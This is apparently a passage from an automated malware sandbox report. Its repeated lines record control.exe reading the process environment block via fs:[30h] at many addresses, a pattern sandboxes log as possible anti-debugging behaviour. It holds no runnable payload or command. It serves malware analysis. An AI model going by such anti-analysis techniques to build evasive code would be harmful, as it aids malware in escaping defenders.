          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F14FB mov eax, dword ptr fs:[00000030h]10_2_047F14FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]10_2_04804015
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]10_2_04804015
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047358EC mov eax, dword ptr fs:[00000030h]10_2_047358EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov ecx, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov ecx, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047790AF mov eax, dword ptr fs:[00000030h]10_2_047790AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474849B mov eax, dword ptr fs:[00000030h]10_2_0474849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739080 mov eax, dword ptr fs:[00000030h]10_2_04739080
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801074 mov eax, dword ptr fs:[00000030h]10_2_04801074
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]10_2_047B3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]10_2_047B3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]10_2_0473B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]10_2_0473B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]10_2_0475C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]10_2_0475C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C962 mov eax, dword ptr fs:[00000030h]10_2_0473C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04757D50 mov eax, dword ptr fs:[00000030h]10_2_04757D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]10_2_048005AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]10_2_048005AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]10_2_0475B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]10_2_0475B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04773D43 mov eax, dword ptr fs:[00000030h]10_2_04773D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3540 mov eax, dword ptr fs:[00000030h]10_2_047B3540
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AD30 mov eax, dword ptr fs:[00000030h]10_2_0473AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FE539 mov eax, dword ptr fs:[00000030h]10_2_047FE539
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]10_2_0476513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]10_2_0476513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047BA537 mov eax, dword ptr fs:[00000030h]10_2_047BA537
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov ecx, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047E8DF1 mov eax, dword ptr fs:[00000030h]10_2_047E8DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047C41E8 mov eax, dword ptr fs:[00000030h]10_2_047C41E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]10_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]10_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808D34 mov eax, dword ptr fs:[00000030h]10_2_04808D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047635A1 mov eax, dword ptr fs:[00000030h]10_2_047635A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B69A6 mov eax, dword ptr fs:[00000030h]10_2_047B69A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762990 mov eax, dword ptr fs:[00000030h]10_2_04762990
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A185 mov eax, dword ptr fs:[00000030h]10_2_0476A185
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C182 mov eax, dword ptr fs:[00000030h]10_2_0475C182
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477927A mov eax, dword ptr fs:[00000030h]10_2_0477927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474766D mov eax, dword ptr fs:[00000030h]10_2_0474766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FEA55 mov eax, dword ptr fs:[00000030h]10_2_047FEA55
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047C4257 mov eax, dword ptr fs:[00000030h]10_2_047C4257
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFE3F mov eax, dword ptr fs:[00000030h]10_2_047EFE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473E620 mov eax, dword ptr fs:[00000030h]10_2_0473E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808ED6 mov eax, dword ptr fs:[00000030h]10_2_04808ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov ecx, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04753A1C mov eax, dword ptr fs:[00000030h]10_2_04753A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04768E00 mov eax, dword ptr fs:[00000030h]10_2_04768E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1608 mov eax, dword ptr fs:[00000030h]10_2_047F1608
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04748A0A mov eax, dword ptr fs:[00000030h]10_2_04748A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762AE4 mov eax, dword ptr fs:[00000030h]10_2_04762AE4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047616E0 mov ecx, dword ptr fs:[00000030h]10_2_047616E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047476E2 mov eax, dword ptr fs:[00000030h]10_2_047476E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04778EC7 mov eax, dword ptr fs:[00000030h]10_2_04778EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047636CC mov eax, dword ptr fs:[00000030h]10_2_047636CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762ACB mov eax, dword ptr fs:[00000030h]10_2_04762ACB
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFEC0 mov eax, dword ptr fs:[00000030h]10_2_047EFEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FAB0 mov eax, dword ptr fs:[00000030h]10_2_0476FAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B46A7 mov eax, dword ptr fs:[00000030h]10_2_047B46A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808A62 mov eax, dword ptr fs:[00000030h]10_2_04808A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFE87 mov eax, dword ptr fs:[00000030h]10_2_047CFE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB60 mov ecx, dword ptr fs:[00000030h]10_2_0473DB60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474FF60 mov eax, dword ptr fs:[00000030h]10_2_0474FF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04805BA5 mov eax, dword ptr fs:[00000030h]10_2_04805BA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473F358 mov eax, dword ptr fs:[00000030h]10_2_0473F358
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB40 mov eax, dword ptr fs:[00000030h]10_2_0473DB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474EF40 mov eax, dword ptr fs:[00000030h]10_2_0474EF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476E730 mov eax, dword ptr fs:[00000030h]10_2_0476E730
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475F716 mov eax, dword ptr fs:[00000030h]10_2_0475F716
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F131B mov eax, dword ptr fs:[00000030h]10_2_047F131B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]10_2_0476A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]10_2_0476A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047737F5 mov eax, dword ptr fs:[00000030h]10_2_047737F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]10_2_0480070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]10_2_0480070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
